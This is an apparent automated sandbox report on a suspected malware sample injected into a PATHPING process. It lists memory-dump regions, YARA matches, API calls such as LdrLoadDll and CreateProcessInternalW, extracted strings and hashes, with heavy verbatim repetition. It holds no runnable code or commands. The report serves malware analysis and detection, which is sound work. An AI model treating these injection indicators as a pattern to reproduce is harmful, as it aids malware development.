                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 0-1925500867

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 02BB0A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 1836367815-1925500867

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 02BB0A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 1836367815-1925500867

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02BA9DB5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID: uAs$f_
                                                                                                                        • API String ID: 2422867632-1128715547
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02BC36DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02BB4162
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02BB4162
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02BB7E9E,00000010,?,?,?,00000044,?,00000010,02BB7E9E,?,?,?), ref: 02BC93A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02BA9DB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02BB4162
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02BB4162
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BFC4589,00000007,00000000,00000004,00000000,02BB39D6,000000F4), ref: 02BC92EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(02BB1649,?,02BC527F,02BB1649,02BC51DF,02BC527F,?,02BB1649,02BC51DF,00001000,?,?,00000000), ref: 02BC929F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02BB7F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02BB7F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02BB1940,02BC7B1F,02BC51DF,02BB1906), ref: 02BB7D03
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135867710.0000000003500000.00000040.00000800.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135867710.0000000003500000.00000040.00000800.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 036B4787
                                                                                                                        • ExecuteOptions, xrefs: 036B46A0
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036B4655
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036B4742
                                                                                                                        • Execute=1, xrefs: 036B4713
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036B46FC
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036B4725
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036B02BD
                                                                                                                        • RTL: Re-Waiting, xrefs: 036B031E
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036B02E7
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036B7B7F
                                                                                                                        • RTL: Re-Waiting, xrefs: 036B7BAC
                                                                                                                        • RTL: Resource at %p, xrefs: 036B7B8E
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036B728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036B7294
                                                                                                                        • RTL: Re-Waiting, xrefs: 036B72C1
                                                                                                                        • RTL: Resource at %p, xrefs: 036B72A3
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: 27703e55c858a4f606b03fba3c9ad70b41872298e0c4cddef4cd6bb666b7dc95
                                                                                                                        • Instruction ID: dd0740dbf966d0fbfdbe93b1db55dc66cd2ab903af29489fac4c384fa6034e75
                                                                                                                        • Opcode Fuzzy Hash: 27703e55c858a4f606b03fba3c9ad70b41872298e0c4cddef4cd6bb666b7dc95
                                                                                                                        • Instruction Fuzzy Hash: 5331867AA006199FDB20DF29CD50BEEB7B8EB44610F44495AE949E7200EB30DA458FA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280